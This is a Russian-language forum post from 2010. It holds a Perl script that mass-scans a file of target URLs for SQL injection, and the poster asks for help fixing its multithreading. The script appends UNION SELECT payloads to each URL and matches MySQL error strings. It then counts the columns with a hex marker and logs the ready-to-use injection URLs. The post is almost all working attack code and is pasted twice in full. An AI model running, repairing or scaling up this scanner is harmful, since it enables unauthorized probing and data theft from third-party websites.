daniel_1024
05.02.2010, 15:56
написал скрипт проверки списка урлов из текстовика на sql-уязвимость и определения количества колонок, ног хотелось бы прикрутить многопоточность...
#!/usr/bin/perl -w
use threads;
use LWP::Simple;
use LWP::UserAgent;
use HTTP::Request;
my @threads;
print "Enter a file with targets:";
$file = <STDIN>;
print "Enter output file:";
$vulnfile=<STDIN>;
open("FILE", $file) || die "Couldn't open file\n";
my @sites=<FILE>;
close("FILE");
chomp(@sites);
my $size = scalar @sites;
my $num = 0;
for my $j (1..2) {
push @threads, threads->create(\&get_now, $j);
}
foreach my $thread (@threads) {
$thread->join();
}
sub get_now
{
while($num < $size){
{ lock($num);
$num++; }
my $site = $sites[$num];
my $i = 0;
my $col = '';
my $specialword = '';
my $null = "09+and+1=" ;
my $code = "0+union+select+" ;
my $add = '+' ;
my $com ='--';
print "\n[+] Testing site: $site\n";
my $injection = $site.$null.$code."0",$com ;
my $useragent = LWP::UserAgent->new();
$useragent->proxy("http", "http://$proxy/") if defined($proxy);
my $response = $useragent->get($injection);
my $result = $response->content;
if( $result =~ m/You have an error in your SQL syntax/i || $result =~ m/Query failed/i || $result =~ m/SQL query failed/i || $result =~ m/mysql_fetch_/i || $result =~ m/mysql_fetch_array/i || $result =~ m/mysql_num_rows/i || $result =~ m/The used SELECT statements have a different number of columns/i )
{
print "[!] This Website Is Vulnerable\n" ;
print "[+] Working On It\n";
for ($i = 0 ; $i < 40 ; $i ++)
{
$col.=','.$i;
$specialword.=','."0x617a38387069783030713938";
if ($i == 0)
{
$specialword = '' ;
$col = '' ;
}
$sql=$site.$null.$code."0x617a38387069783030713938".$specialword.$com ;
$ua = LWP::UserAgent->new();
$ua->proxy("http", "http://$proxy/") if defined($proxy);
#print "$sql\n";
$rq = $ua->get($sql);
$response = $rq->content;
if($response =~ /az88pix00q98/)
{
$i ++;
print "\n[!] MySQL Column Count Finished\n" ;
print "[!] This WebSite Have $i Columns\n" ;
$sql=$site.$null.$code."0".$col.$com ;
print "=> ".$sql ."\n\n";
open(vuln_file,">>$vulnfile");
print vuln_file "$sql\n";
close(vuln_file);
print "[+] Saved to $vulnfile";
}
}
}
else
{
print "[!] This WebSite Is Not SQL Vulnerable !\n";
}
}
sleep 5;
}
пробывал циклом создавать потоки, но работает эта конструкция не так как надо: каждый поток проверяет каждый сайт из текстовика...Т. е. никакого разделения не происходит
помогите подправить
#!/usr/bin/perl -w
use threads;
use LWP::Simple;
use LWP::UserAgent;
use HTTP::Request;
my @threads;
print "Enter a file with targets:";
$file = <STDIN>;
print "Enter output file:";
$vulnfile=<STDIN>;
open("FILE", $file) || die "Couldn't open file\n";
my @sites=<FILE>;
close("FILE");
chomp(@sites);
my $size = scalar @sites;
my $num = 0;
for my $j (1..2) {
push @threads, threads->create(\&get_now, $j);
}
foreach my $thread (@threads) {
$thread->join();
}
sub get_now
{
while($num < $size){
{ lock($num);
$num++; }
my $site = $sites[$num];
my $i = 0;
my $col = '';
my $specialword = '';
my $null = "09+and+1=" ;
my $code = "0+union+select+" ;
my $add = '+' ;
my $com ='--';
print "\n[+] Testing site: $site\n";
my $injection = $site.$null.$code."0",$com ;
my $useragent = LWP::UserAgent->new();
$useragent->proxy("http", "http://$proxy/") if defined($proxy);
my $response = $useragent->get($injection);
my $result = $response->content;
if( $result =~ m/You have an error in your SQL syntax/i || $result =~ m/Query failed/i || $result =~ m/SQL query failed/i || $result =~ m/mysql_fetch_/i || $result =~ m/mysql_fetch_array/i || $result =~ m/mysql_num_rows/i || $result =~ m/The used SELECT statements have a different number of columns/i )
{
print "[!] This Website Is Vulnerable\n" ;
print "[+] Working On It\n";
for ($i = 0 ; $i < 40 ; $i ++)
{
$col.=','.$i;
$specialword.=','."0x617a38387069783030713938";
if ($i == 0)
{
$specialword = '' ;
$col = '' ;
}
$sql=$site.$null.$code."0x617a38387069783030713938".$specialword.$com ;
$ua = LWP::UserAgent->new();
$ua->proxy("http", "http://$proxy/") if defined($proxy);
#print "$sql\n";
$rq = $ua->get($sql);
$response = $rq->content;
if($response =~ /az88pix00q98/)
{
$i ++;
print "\n[!] MySQL Column Count Finished\n" ;
print "[!] This WebSite Have $i Columns\n" ;
$sql=$site.$null.$code."0".$col.$com ;
print "=> ".$sql ."\n\n";
open(vuln_file,">>$vulnfile");
print vuln_file "$sql\n";
close(vuln_file);
print "[+] Saved to $vulnfile";
}
}
}
else
{
print "[!] This WebSite Is Not SQL Vulnerable !\n";
}
}
sleep 5;
}
пробывал циклом создавать потоки, но работает эта конструкция не так как надо: каждый поток проверяет каждый сайт из текстовика...Т. е. никакого разделения не происходит
помогите подправить